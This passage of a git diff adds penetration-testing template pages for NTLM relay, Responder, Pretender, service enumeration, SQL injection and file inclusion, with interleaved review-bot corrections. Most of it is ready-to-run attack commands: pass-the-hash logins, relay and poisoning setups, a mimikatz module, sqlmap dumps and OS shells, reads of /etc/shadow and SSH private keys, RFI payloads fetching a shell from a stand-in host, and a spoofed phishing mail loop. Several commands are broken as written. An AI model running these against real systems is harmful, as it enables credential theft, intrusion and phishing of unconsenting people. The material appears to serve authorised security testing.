HERE' -i 172.21.48.230 + +XfreeRDP: +- xfreerdp /u:Administrator /pth:'INSERT HASH HERE' /v:172.21.48.230 + +# Other NtlmRelayX Commands: +## In Kali: +### SMB +- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c +- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c whoami +### Ldap +- impacket-ntlmrelayx -t ldap://dc.domain.local --shadow-credentials --shadow-target target\$ + +## Python Impacket: +### SMB +- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt -c +- ntlmrelayx.py -tf smb-targets.txt -c whoami +### LDAP +- ntlmrelayx.py -t ldap://dc.domain.local --shadow-credentials 
--shadow-target target\$
+
+# References:
+- https://www.hackingarticles.in/a-detailed-guide-on-responder-llmnr-poisoning/
+- https://infosecwriteups.com/abusing-ntlm-relay-and-pass-the-hash-for-admin-d24d0f12bea0
+- https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
+- https://www.offsec-journey.com/post/attacking-ms-sql-servers
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md
new file mode 100644
index 0000000..9db11a2
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Pretender.md
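Review bot: The "Testing Sock Access" commands such as `proxychains4 impacket-smbexec SPAWN/MSIMMONS@172.21.48.38` will stop at a password prompt, because the session held by ntlmrelayx's SOCKS server is already authenticated; impacket's documented form is `proxychains4 impacket-smbclient SPAWN/MSIMMONS@172.21.48.38 -no-pass` (same for smbexec and secretsdump). `impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt -c` has an empty `-c`, which the argument parser rejects. The shadow-credentials example `-t ldap://dc.domain.local --shadow-credentials --shadow-target target\$` needs two caveats: it typically only works for relayed clients whose authentication is not protected by LDAP signing or channel binding (SMB-originated NTLM relayed to LDAP is normally blocked by signing negotiation), and it writes a new `msDS-KeyCredentialLink` value on the target that must be recorded and removed during cleanup. The `secretsdump` line should likewise be marked as a full credential-database dump (local SAM/LSA, and every domain hash if the target is a DC) whose output falls under the engagement's data-handling rules.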
@@ -0,0 +1,64 @@ +# Source: https://github.com/RedTeamPentesting/pretender + +# Installation + +## In Kali: +- git clone https://github.com/RedTeamPentesting/pretender +- go build +- pretender --help + +## Using Pretender: +- pretender -i eth0 +- pretender -i eth0 --dry (Only logs incoming queries and does not answer any of them) +- pretender -i eth0 --dry --no-ra # without router advertisements + +## Options to disabled certain attacks: + +--no-dhcp-dns +--no-lnr +--no-mdns +--no-llmnr +--no-netbios +--no-ra + +## Tips + +- Make sure to enable IPv6 support in `ntlmrelayx.py` with the `-6` flag +- Pretender can be configured to stop after a certain time period for situations + where it cannot be aborted manually (`--stop-after` and + `main.vendorStopAfter`) +- Host info lookup (which relies on the ARP table, IP neighbours and reverse + lookups) can be disabled with `--no-host-info` or `main.vendorNoHostInfo` +- If you are not sure which interface to choose (especially on Windows), list + all interfaces with names and addresses using `--interfaces` +- If you want to exclude hosts from local name resolution spoofing, make sure to + also exclude their IPv6 addresses or use + `--no-ipv6-lnr`/`main.vendorNoIPv6LNR` +- DHCPv6 messages usually contain a FQDN option (which can also sometimes + contain a hostname which is not a FQDN). This option is used to filter out + messages by hostname (`--spoof-for`/`--dont-spoof-for`). You can decide what + to do with DHCPv6 messages without FQDN option by setting or omitting + `--ignore-nofqdn` +- Depending on the build configuration, either the operating system resolver + (`CGO_ENABLED=1`) or a Go implementation (`CGO_ENABLED=0`) is used. This can + be important for host info collection because the OS resolver may support + local name resolution and the Go implementation does not, unless a stub + resolver is used. +- The host info functionality is currently only available for Windows and Linux. 
+- A custom MAC address vendor list can be compiled into the binary by replacing + the default list `hostinfo/mac-vendors.txt`. Only lines with MAC prefixes in + the following format are recognized: `FF:FF:FFVendorIDVendor` (the + MAC prefix length can be arbitrary). +- If you only want to perform Kerberos relaying you can specify `--no-lnr` and + `--spoof-types SOA` to ignore any queries that are unrelated to the attack. +- When conducting a Kerberos relay attack where `krbrelayx.py` runs on a + different host than pretender (relay IPv4 address points to different host + that runs `krbrelayx.py`), the host running `krbrelayx.py` will also need to + run pretender in order to receive and deny the Dynamic Update query sent to + the relay IPv4 address. +- By default, in order to limit disruption during a DHCPv6 DNS Takeover, the + option `--delegate-ignored-to ` can be used to delegate ignored + queries to a legitimate DNS server. +- The option `--dry-with-dhcp` can be combined with `--delegate-ignored-to` to + monitor the name resolution queries in the network without disruption. +--- \ No newline at end of file diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md new file mode 100644 index 0000000..3aa02a9 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Responder.md 
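Review bot: The install steps `git clone ...` / `go build` / `pretender --help` skip `cd pretender`, so the build runs in whatever directory the reader happens to be in and the resulting binary is `./pretender`, not something on `PATH`; add `cd pretender` and make the last line `./pretender --help`. More importantly the usage section leads with `pretender -i eth0`, which immediately starts DHCPv6 and router-advertisement DNS takeover for every Windows host on the segment; the page should put the observation run first and bound the blast radius, e.g. `pretender -i eth0 --dry` followed by `pretender -i eth0 --stop-after 30m --delegate-ignored-to <legit-dns-ip>`. The tip "By default, in order to limit disruption ... the option `--delegate-ignored-to ` can be used" contradicts itself and lost its argument: it should say that passing `--delegate-ignored-to <DNS server IP>` is recommended (it is not the default) so hosts keep resolving names the attack does not care about.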
@@ -0,0 +1,103 @@ +# Source: + +https://github.com/lgandx/Responder + +# Tools in Responder: + +Location: /usr/share/Responder/tools + +# Make changes to config to turn off services: + +`nano /usr/share/responder/Responder.conf` + +# Configuring MultiRelay: +In Kali Linux: +1. pip install pycryptodome +2. Install Mingw and create multi relay binaries: +``` +sudo apt-get install gcc-mingw-w64-x86-64 +sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Runas.c -o ./MultiRelay/bin/Runas.exe -municode -lwtsapi32 -luserenv +sudo x86_64-w64-mingw32-gcc ./MultiRelay/bin/Syssvc.c -o ./MultiRelay/bin/Syssvc.exe -municode +``` +4. python3 MultiRelay.py +``` +Usage: +responder-MultiRelay -t 10.20.30.40 -u Administrator lgandx admin +responder-MultiRelay -t 10.20.30.40 -u ALL + +Options: + --version show program's version number and exit + -h, --help show this help message and exit + -t 10.20.30.45 Target server for SMB relay. + -p 8081 Additional port to listen on, this will relay for + proxy, http and webdav incoming packets. + -u, --UserToRelay Users to relay. Use '-u ALL' to relay all users. + -c whoami, --command=whoami + Single command to run (scripting) + -d, --dump Dump hashes (scripting) +``` + + +# Starting Responder: + +- responder -I [Interface] -A +- responder -I [Interface] -i [IP Address] or -e [External IP] -A + +## Starting Responder in Basic Authentication Mode +- responder -I [Interface] -wdF -b + +## Force NTLM Authentication to version 1 instead of version 2: +- responder -I [Interface] -wdF --lm --disable-ess + +## External IP Poisoning +- responder -I [Interface] -e 172.21.1.2 + +## DNS Injection in DHCP Responses +- responder -i [interface] -D + +# Using Responder-RunFinger to verify if SMB Signing is not enabled + +- responder-RunFinger -i 172.21.0.0/24 +- python3 RunFinger.py -i 172.21.0.0/24 + +# Using Responder-MultiRelay +Tips: +Multirelay uses the default version of mimikatz and it can easily flagged by AV. 
It is recommend to compile your own custom version and use it with mutlirelay. +Do not run multirelay against targets that have smb message_signing enabled: + +- responder-Multirelay -t 172.21.0.0 - u ALL +- python3 Multirelay.py -t 172.21.0.0 -u ALL + +# Using Responder with Impacket-Ntlmrelayx +NtlmRelayX is an impacket script that allows you to conduct NTLM Relay Attacks, by creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.). + +1. When you are using responder to capture challenges and relay them to ntlmrelayx you will need to turn off HTTP and SMB in the responder.conf file. Also have a list of what systems are running smb and have smb signing disabled. + +2. Set up a socks proxy on port 1080. This socks proxy will successfully relay the traffic to ntlmrelayx. +- sudo nano /etc/proxychains4.conf +``` +[ProxyList] +# NtlmRelayX Socks Proxy +socks4 127.0.0.1 1080 +# Other Proxies +``` +3. Run Responder and NtlmRelayX to watch the magic happen: +- sudo Responder -I [Interface] +- impacket-ntlmrelayx -socks -smb2support -tf smb-targets.txt +- ntlmrelayx.py -socks -smb2support -tf smb-targets.txt + +To view a full list of captured sessions from NtlmRelayX +``` +ntlmrelayx> socks +Protocol Target Username Port +-------- -------------- ------------------------ ---- +SMB 172.21.48.38 SPAWN/MSIMMONS 445 +SMB 172.21.48.230 FAERIE/ADMINISTRATOR 445 +SMB 172.21.48.230 FAERIE/ALSIMMONS 445 +``` + +# References: + +- https://github.com/lgandx/Responder + + diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md new file mode 100644 index 0000000..cb63800 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/01. FTP/Enumerating FTP.md 
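Review bot: `responder -I [Interface] -wdF --lm --disable-ess` (labelled "Force NTLM Authentication to version 1") is a downgrade attempt that only succeeds against clients whose LmCompatibilityLevel still permits LM/NTLMv1, and `-wdF -b` pops a cleartext Basic-auth prompt in users' browsers; both are loud and user-visible and should be marked `# user-visible / downgrade attack — only with explicit client sign-off`. The page should also state plainly that `responder -I [Interface] -A` is analyze mode (listen only, no poisoning) and is the safe first step, since nothing currently distinguishes it from the poisoning commands beneath it. Typos that break copy-paste: `responder -i [interface] -D` should use `-I`, `responder-Multirelay -t 172.21.0.0 - u ALL` has a space inside `-u`, and the MultiRelay steps jump from 2 to 4.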
@@ -0,0 +1,46 @@ +# General Notes: +Always try anonymous login if it is avaliable: + +Username: anonymous +Password: anonymous (or keys you want to put in.) + +# FTP Enumeration Tools +## Manual Connection +``` +$ ftp 172.21.0.0 +``` +``` +$ nc -vn 172.21.0.0 21 +``` +## Connect via Browser +``` +ftp://172.21.0.0 +``` + +## Nmap FTP Enumeration +``` + +$ ls -lh /usr/share/nmap/scripts/ | grep ftp +-rw-r--r-- 1 root root 4.5K Oct 12 09:29 ftp-anon.nse +-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-bounce.nse +-rw-r--r-- 1 root root 3.1K Oct 12 09:29 ftp-brute.nse +-rw-r--r-- 1 root root 3.2K Oct 12 09:29 ftp-libopie.nse +-rw-r--r-- 1 root root 3.3K Oct 12 09:29 ftp-proftpd-backdoor.nse +-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ftp-syst.nse +-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ftp-vsftpd-backdoor.nse +-rw-r--r-- 1 root root 5.8K Oct 12 09:29 ftp-vuln-cve2010-4221.nse +-rw-r--r-- 1 root root 5.7K Oct 12 09:29 tftp-enum.nse +$ nmap x.x.x.x -p 21 -sV --script=exampleScript1.nse,exampleScript2.nse +``` + +## CrackMapExec + +``` +- crackmapexec ftp 172.21.0.0 +- crackmap exec ftp 172.21.0.0 -u 'a' -p '' +- crackmapexec ftp 172.21.0.0 -u 'anonymous' -p ''' + +# FTP Default wordlists: +/usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt + +``` diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md new file mode 100644 index 0000000..02f7e14 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/02. SSH/Enumerating SSH.md 
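Review bot: The code fence opened before the CrackMapExec list is never closed before the "FTP Default wordlists" heading, so that heading and the wordlist path render inside the block; close the fence right after the `crackmapexec` lines. `crackmap exec ftp 172.21.0.0 -u 'a' -p ''` has a space in the tool name, and `-p '''` on the next line has an unbalanced quote. Because the hunk lists `ftp-brute.nse` and a default-credential wordlist, add the caveat `# brute/default-cred sprays can lock accounts on FTP servers backed by AD or PAM lockout — confirm the policy first`, and note that `ftp-proftpd-backdoor` and `ftp-vsftpd-backdoor` are intrusive checks rather than passive enumeration.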
@@ -0,0 +1,44 @@ +# Manual Connection + +``` +$ ssh 172.21.0.0 -p22 +$ nc -nv 172.21.0.0 22 # Might give header +``` + +# SSH Enumeration Tools + +## Nmap Enumeration +``` +$ ls -lh /usr/share/nmap/scripts/ | grep ssh +-rw-r--r-- 1 root root 5.3K Oct 12 09:29 ssh2-enum-algos.nse +-rw-r--r-- 1 root root 1.2K Oct 12 09:29 ssh-auth-methods.nse +-rw-r--r-- 1 root root 3.0K Oct 12 09:29 ssh-brute.nse +-rw-r--r-- 1 root root 16K Oct 12 09:29 ssh-hostkey.nse +-rw-r--r-- 1 root root 5.9K Oct 12 09:29 ssh-publickey-acceptance.nse +-rw-r--r-- 1 root root 3.7K Oct 12 09:29 ssh-run.nse +-rw-r--r-- 1 root root 1.4K Oct 12 09:29 sshv1.nse + +$ nmap 172.21.0.0 -p 22 -sV ssh-hostkey --script-args ssh_hostkey=full +$ nmap 172.21.0.0 -p 22 -sV ssh-auth-methods --script-args="ssh.user=root" +``` + +## Crackmapexec + +``` +- crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce +- crackmapexec ssh 172.21.0.0 -u root -p password/passwordfile --no-bruteforce -x whoami +``` + +## SSH Audit: +Source: https://github.com/jtesta/ssh-audit + +``` +python ssh-audit.py [-1246pbcnjvlt] 172.21.0.0 +``` + +## Metasploit +``` +Auxilary Modules: +auxiliary/scanner/ssh/ssh_version +use scanner/ssh/ssh_enumusers +``` diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md new file mode 100644 index 0000000..3149135 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/03. Email Services/Enumerating Email Services.md 
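Review bot: `nmap 172.21.0.0 -p 22 -sV ssh-hostkey --script-args ssh_hostkey=full` and the `ssh-auth-methods` line are missing `--script`, so nmap treats `ssh-hostkey` as a second target hostname; they should be `--script ssh-hostkey --script-args ssh_hostkey=full` and `--script ssh-auth-methods --script-args="ssh.user=root"`. `scanner/ssh/ssh_enumusers` relies on the OpenSSH username-enumeration timing issue (CVE-2018-15473, fixed in 7.7) and reports noise against patched servers, which the note should say so results are not over-read. The `crackmapexec ssh ... -p password/passwordfile` lines are a credential spray and should carry the same lockout warning the template uses elsewhere.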
@@ -0,0 +1,68 @@ +# SMTP Ports: + +25, 465, 587 + +## Manual Connection +``` +$ nc -nv x.x.x.x 25 + +``` + +# SMTP Enumeration Tools + +## Nmap Enumeration +``` +$ ls -lh /usr/share/nmap/scripts/ | grep smtp +-rw-r--r-- 1 root root 4309 Oct 12 09:29 smtp-brute.nse +-rw-r--r-- 1 root root 4769 Oct 12 09:29 smtp-commands.nse +-rw-r--r-- 1 root root 12006 Oct 12 09:29 smtp-enum-users.nse +-rw-r--r-- 1 root root 5873 Oct 12 09:29 smtp-ntlm-info.nse +-rw-r--r-- 1 root root 10148 Oct 12 09:29 smtp-open-relay.nse +-rw-r--r-- 1 root root 716 Oct 12 09:29 smtp-strangeport.nse +-rw-r--r-- 1 root root 14781 Oct 12 09:29 smtp-vuln-cve2010-4344.nse +-rw-r--r-- 1 root root 7719 Oct 12 09:29 smtp-vuln-cve2011-1720.nse +-rw-r--r-- 1 root root 7603 Oct 12 09:29 smtp-vuln-cve2011-1764.nse +$ nmap x.x.x.x -p 25 -sV --script=exampleScript1.nse,exampleScript2.nse +``` + +## Metasploit: + +``` +msf > use auxiliary/scanner/smtp/smtp_enum +msf auxiliary(smtp_enum) set RHOSTS +msf auxiliary(smtp_enum) > set rport 25 +msf auxiliary(smtp_enum) set USER_FILE
+msf auxiliary(smtp_enum) run +``` + +## smtp-user-enum + - Install (Kali Linux): + ``` +sudo apt install smtp-user-enum +``` + +``` +$ smtp-user-enum -M VRFY -U users.txt -t 172.21.0.0 +$ smtp-user-enum -M EXPN -u admin1 -t 172.21.0.0 +$ smtp-user-enum -M RCPT -U users.txt -T server-ips.txt +$ smtp-user-enum -M EXPN -D example.com -U users.txt -t 172.21.0.0 +``` + +## Mass email + +If you've collected emails from the target domain, you can use something like the following to send out super simple phishing emails. (Saw this on a HTB machine, keep expectations of success low in the real world) +``` +$ while read mail; do swaks –to $mail –from IT@targetdomain.com –header "Subject: Credentials / Errors" –body "goto http://attackerIP/" –server x.x.x.x; done < mails.txt +``` + +# POP3 Enumeration + +## Nmap Enumeration + +``` +$ ls -lh /usr/share/nmap/scripts/ | grep pop +-rw-r--r-- 1 root root 3953 Oct 12 09:29 pop3-brute.nse +-rw-r--r-- 1 root root 1397 Oct 12 09:29 pop3-capabilities.nse +-rw-r--r-- 1 root root 4941 Oct 12 09:29 pop3-ntlm-info.nse +$ nmap x.x.x.x -p 110 -sV --script=exampleScript1.nse,exampleScript2.nse +``` \ No newline at end of file diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md new file mode 100644 index 0000000..6dfda13 --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Directory Fuzzing.md 
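Review bot: The swaks loop is written with en-dashes (`–to`, `–from`, `–header`, `–body`, `–server`) instead of `--`, so copy-pasting it fails immediately; it should read `swaks --to $mail --from IT@targetdomain.com --header "Subject: Credentials / Errors" --body "goto http://attackerIP/" --server x.x.x.x`. Because that line actually sends spoofed mail to every harvested address, the page should require that phishing be explicitly authorised in the rules of engagement and the sending domain and lure pre-agreed, rather than just "keep expectations low". The Metasploit snippet lost its values (`set RHOSTS` and `set USER_FILE` with nothing after them), and `smtp-user-enum -M VRFY/EXPN/RCPT` deserves a note that every probe is logged by the mail server.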
@@ -0,0 +1,37 @@ +# Web Tools for Directory Scanning: + +Dirb: + +- dirb +- dirb + +Gobuster: + +- gobuster dir -u -w /usr/share/wordlists/ +- gobuster dir -u -w /usr/share/wordlists/ -a Firefox (Custom Agent) +- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html +- gobuster dir -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" +- gobuster dir -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt +- gobuster dir -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36' + +Wfuzz: + +- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ +- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ +- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests) + +- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies) + +Dirsearch: + +- dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php + +FFuF: + +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -b "COOKIE VALUE; security=low" -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -fc 403, 302, 200 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -H "Host: 172.21.0.0" -u http://172.21.0.0 +- ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://172.21.0.0 -timeout 5 \ No newline at end of file 
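Review bot: `ffuf ... -u http://172.21.0.0 -fc 403, 302, 200` breaks twice: the spaces after the commas turn `302,` and `200` into separate arguments, and `-fc` filters those codes out, so 200 responses would be hidden — if the intent is to surface hits use `-mc 200,204,301,302,307,403` with no spaces. `wfuzz -z file,... -d "uname=FUZZ&pass=FUZZ"` substitutes the same word into both fields; a second list needs a second `-z` and `FUZ2Z`. `dirsearch /usr/share/wordlists/...` is missing `-w`, and the gobuster lines that pass `-s 200` need `-b ""` on recent gobuster versions, which refuse to run with both a status allow-list and the default blacklist (version-dependent, worth a note).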
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md new file mode 100644 index 0000000..0abaebd --- /dev/null +++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/Enumerating Web Services.md 
@@ -0,0 +1,89 @@ + +# Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE! + +## Step 2: + +## Common Wordlists to use for Web App Scanning: + +Common Wordlists to use for Web Directory Scanning: +- /usr/share/wordlists/dirb/common.txt +- /usr/share/wordlists/dirbuster/*.txt +- /usr/share/wordlists/wfuzz/general/*.txt +- /usr/share/seclists/Discovery/Web-Content/ +- Assetnote Wordlists: https://wordlists.assetnote.io/ +- Jhaddix Content Discovery: https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10 + +Common Wordlists to use for User Enumeration Scanning: +- /usr/share/seclists/Usernames +- /usr/share/wordlists/dirbuster/apache-user-enum-2.0 + +## Web App Scanners + + +Wpscan(WordPress Scannner): + +- wpscan --url +- wpscan --url --enumerate ap at (All Plugins, All Themes) +- wpscan --url --enumerate u (Usernames) +- wpscan --url --enumerate v + + + +Other Tools: +- Burp Suite +- OWASP Zap +- Cadaver +- SQLMap +- Joomscan +- Feroxbuster + +## Testing for LFI: + +https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf + +Examples: + +http://example.com/index.php?page=etc/passwd +http://example.com/index.php?page=etc/passwd%00 +http://example.com/index.php?page=../../etc/passwd +http://example.com/index.php?page=%252e%252e%252f +http://example.com/index.php?page=....//....//etc/passwd + +Interesting Files: + +Linux: + +``` +/etc/passwd +/etc/shadow +/etc/issue +/etc/group +/etc/hostname +/etc/ssh/ssh_config +/etc/ssh/sshd_config +/root/.ssh/id_rsa +/root/.ssh/authorized_keys +/home/user/.ssh/authorized_keys +/home/user/.ssh/id_rsa +``` + +Windows: +``` +/boot.ini +/autoexec.bat +/windows/system32/drivers/etc/hosts +/windows/repair/SAM +``` + + +## Testing for RFI: + +http://example.com/index.php?page=http://callback.com/shell.txt +http://example.com/index.php?page=http://callback.com/shell.txt%00 +http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt + +## Resources + +- Turning 
LFI to RFI:
+https://l.avala.mp/?p=241
+Backup: https://web.archive.org/web/20210612222732/https://l.avala.mp/?p=241
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md
new file mode 100644
index 0000000..cc7d1db
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. Web (HTTP_HTTPS)/SQL Injection.md
@@ -0,0 +1,25 @@
+Testing for Bypasses:
+
+' or 1=1 LIMIT 1 --
+' or 1=1 LIMIT 1 -- -
+' or 1=1 LIMIT 1#
+'or 1#
+' or 1=1 --
+' or 1=1 -- -
+
+# SQLMAP
+
+## sqlmap crawl
+sqlmap -u http://172.21.0.0 --crawl=1
+
+## sqlmap dump database
+sqlmap -u http://172.21.0.0 --dbms=mysql --dump
+
+## sqlmap shell
+sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
+
+# SQLI
+
+Testing for a row:
+
+- http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md
new file mode 100644
index 0000000..6d05e35
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/05. Network Shares (SMB, SAMBA, NFS)/SMB Enumeration.md
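Review bot: `http://example.com/index.php?page=etc/passwd` and its `%00` variant lack the leading `/`, so they only resolve if the include base happens to be the filesystem root; the canonical probes are `page=/etc/passwd` and `page=../../../../etc/passwd`. The `%00` null-byte truncation lines should carry the caveat that they only work on PHP older than 5.3.4, so a miss there says nothing about whether LFI exists. The "Interesting Files" list includes `/etc/shadow`, `/root/.ssh/id_rsa` and `/windows/repair/SAM`; successfully reading those yields compromise-grade material, and the template should tell testers to evidence, not retain, such files and report them per the data-handling agreement. The empty `## Step 2:` heading should either get content or be removed.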
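Review bot: `sqlmap -u http://172.21.0.0 --dbms=mysql --dump` and `--os-shell` are shown without any scoping: `--dump` with no `-D`/`-T` pulls every table of the current database, customer data included, and `--os-shell` uploads a stager into the web root that remains there until someone removes it. Suggest `sqlmap -u <url> --dbms=mysql -D <db> -T <table> --dump` with a note to agree data-extraction limits beforehand, and `# --os-shell writes a file into the web root — record its path for cleanup`. In the bypass list, `' or 1=1 --` needs a trailing space to be a comment in MySQL, which is why the `-- -` variants exist; a one-line note there avoids a confusing false negative.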
@@ -0,0 +1,84 @@
+# Nmap Enumeration:
+```
+/usr/share/nmap/scripts/smb-brute.nse
+/usr/share/nmap/scripts/smb-enum-domains.nse
+/usr/share/nmap/scripts/smb-enum-groups.nse
+/usr/share/nmap/scripts/smb-enum-processes.nse
+/usr/share/nmap/scripts/smb-enum-services.nse
+/usr/share/nmap/scripts/smb-enum-sessions.nse
+/usr/share/nmap/scripts/smb-enum-shares.nse
+/usr/share/nmap/scripts/smb-enum-users.nse
+/usr/share/nmap/scripts/smb-flood.nse
+/usr/share/nmap/scripts/smb-ls.nse
+/usr/share/nmap/scripts/smb-mbenum.nse
+/usr/share/nmap/scripts/smb-os-discovery.nse
+/usr/share/nmap/scripts/smb-print-text.nse
+/usr/share/nmap/scripts/smb-protocols.nse
+/usr/share/nmap/scripts/smb-psexec.nse
+/usr/share/nmap/scripts/smb-security-mode.nse
+/usr/share/nmap/scripts/smb-server-stats.nse
+/usr/share/nmap/scripts/smb-system-info.nse
+```
+
+- nmap --script smb-* -p 139,445, 172.21.0.0
+- nmap --script smb-enum-* -p 139,445, 172.21.0.0
+
+
+
+# Enum4linux:
+
+- Enum4linux -a 172.21.0.0
+- Enum4linux -U 172.21.0.0
+- Enum4linux -r 172.21.0.0
+- Enum4linux -S 172.21.0.0
+
+# Enum4linux-Ng
+https://github.com/cddmp/enum4linux-ng
+- Enum4linux 172.21.0.0 -A
+- Enum4linux-ng 172.21.0.0 -A -C
+- Enum4linux 172.21.0.0 -S
+- Enum4linux 172.21.0.0 -K ticket.kirbi -A
+
+# SMBmap:
+
+- smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
+- smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
+
+# SMBClient:
+
+- smbclient -L 172.21.0.0
+- smbclient //172.21.0.0/tmp
+
+Recursively list a directory:
+```
+$ smbclient \\\\x.x.x.x\\Folder
+smb: \> recurse on
+smb: \> ls
+```
+
+# Impacket:
+
+## Smbclient:
+- /usr/share/doc/python3-impacket/examples/smbclient.py username@172.21.0.0
+- impacket-smbclient username@172.21.0.0
+## Samdump:
+- Impackert-sam SMB 172.21.0.0
+
+# RPCclient:
+
+- rpcclient -U "" -N 172.21.0.0 enumdomusers
+
+# CrackMapExec:
+
+- crackmapexec smb -L
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --local-auth
+- crackmapexec 172.21.0.0 -u Administrator -H [hash] --share
+- crackmapexec smb --gen-relay-list smb-targets.txt 172.21.0.0/24
+- crackmapexec smb 172.21.0.0/24 -u user -p 'Password' --local-auth -M mimikatz
+- crackmapexec smb x.x.x.x --pass-pol -u '' -p ''
+
+# Polenum:
+- polenum -u '' -p '' -d x.x.x.x
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md
new file mode 100644
index 0000000..83f9631
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/3. Active Directory (AD)/General Notes.md
@@ -0,0 +1,37 @@
